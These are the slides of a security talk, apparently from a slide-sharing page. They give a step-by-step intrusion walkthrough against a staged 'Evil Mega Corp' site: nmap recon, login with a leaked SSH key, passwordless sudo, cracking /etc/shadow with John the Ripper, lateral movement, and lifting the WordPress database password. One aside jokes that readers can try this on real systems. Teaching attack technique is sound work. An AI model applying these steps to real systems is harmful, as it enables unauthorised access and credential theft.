Who is this person? —Etsy security team. —Spoke here last year —(everything broke, never do live demos!) —been typing on computers for coins for 15+ years
You will need. —A web browser. (we'll assume you have one of these!) —An SSH client. —Unix/Mac: you have SSH, it's the best. —Windows: Putty —nmap: www.nmap.org (optional)
No really, what are we talking about today? —How you actually hax in to real live companies. —Reconnaissance in to systems. —Lateral movement between systems. —REAL LIFE HOW SYSTEMS GET HACKED. —(you can go do this on real live systems, regrettably1) 1 may be illegal. Ask a grown up/lawyer/use a coffee shop.
Targeting evil corporations I have preselected a target as we are time limited. Evil Mega Corp http://www.evilmegacorp.co/ Go look at their website, they're real evil...
Recon! Nmap! download it at www.nmap.org Security tool that everyone uses. Makes a TCP/IP connection to each port on the target host. Will tell you what is at the other end. (can do cool stuff like run scripts at it)
nmap $ nmap -F -T4 -A www.evilmegacorp.co Starting Nmap 6.47 ( http://nmap.org ) Nmap scan report for www.evilmegacorp.co (45.55.197.171) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: WordPress 4.2.3 | http-robots.txt: 1 disallowed entry |_/ |_http-title: Evil Mega Corp | The most evil of mega corporations
More recon Maybe there's something else, never give up. Let's go look at their website. http://blog.evilmegacorp.co/about-us/ (Hint: I think Dave has a useful link)
$ ssh -i ~/Downloads/id_rsa.txt [email protected] Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-57-generic x86_64) * Documentation: https://help.ubuntu.com/ System information as of Sun Jul 26 03:02:12 EDT 2015 System load: 0.0 Processes: 67 Usage of /: 9.2% of 19.56GB Users logged in: 0 Memory usage: 14% IP address for eth0: 104.236.53.106 Swap usage: 0% IP address for eth1: 10.132.233.155 [email protected]:~$ cat .bash_history id ls ls -la vi .bash_profile ssh 10.132.236.169 [email protected]:~$
Cool story, now what can I do. [email protected]:~$ sudo -ln .... User dave may run the following commands on boing: (root) NOPASSWD: ALL WAIT WHAT? I can run sudo -s to get root WITH NO PASSWORD! COOL !
Password cracking 101 [email protected]:~# egrep -v 'dave:' /etc/shadow dave:$1$heh$lZPrLI4ejKHiH6/okTMBQ.:16639:0:99999:7::: John the ripper docs. hashcat, which is similar, but newer. ArsTechnica article on how to crack passwords. SkullSecurity wiki page on passwords.
John the ripper You give john a big list of words, it will try them all and see if any match. [email protected]# rm -f /root/.john/john.pot [email protected]# john --wordlist=/usr/share/dict/wordlist.txt /etc/shadow Loaded 1 password hash (md5crypt [MD5 32/64 X2]) Press 'q' or Ctrl-C to abort, almost any other key for status yay dogs (dave) 1g 0:00:00:27 100% 0.03673g/s 10733p/s 10733c/s 10733C/s yay dogs
HACK THE GIBSON Using the .ssh/known_hosts trickery from before combined with the password, what do we get? [email protected]:~$ cat .ssh/known_hosts 10.132.236.169 ecdsa-sha2-nistp256 AAAAE2VjZ.... [email protected]:~$ ssh 10.132.236.169 [email protected]'s password: [email protected]:~$ id uid=1000(dave) gid=1000(dave) groups=1000(dave)
I wonder... [email protected]:~$ cd /var/www/html/ [email protected]:/var/www/html$ ls -oh wp-config.php -rw-r--r-- 1 www-data 2.7K Jul 22 16:22 wp-config.php Wait, we can read the config file!? ! " #
MAD HAX [email protected]:~$ grep DB_ /var/www/html/wp-config.php define('DB_NAME', 'wordpress'); define('DB_USER', 'wordpress'); define('DB_PASSWORD', 'QNqJgIJD39'); define('DB_HOST', 'localhost'); ... So now we have the database password!
I've got the key, I've got the secret mysql -Dwordpress -uwordpress -pQNqJgIJD39 You now have full control of the database for all of Wordpress for the site. !!!!
barnbarn
oracle4engineer
hanhan1978
minorun365
ganota
muno92
seike460
miura55
drumath2237
eliasnogueira
hirokiigeta
regonn
reverentgeek
jmmastey
shlominoach
orderedlist
tanoku
trallard
mraible
thoeni
mclloyd
danielanewman
wjessup
davidbonilla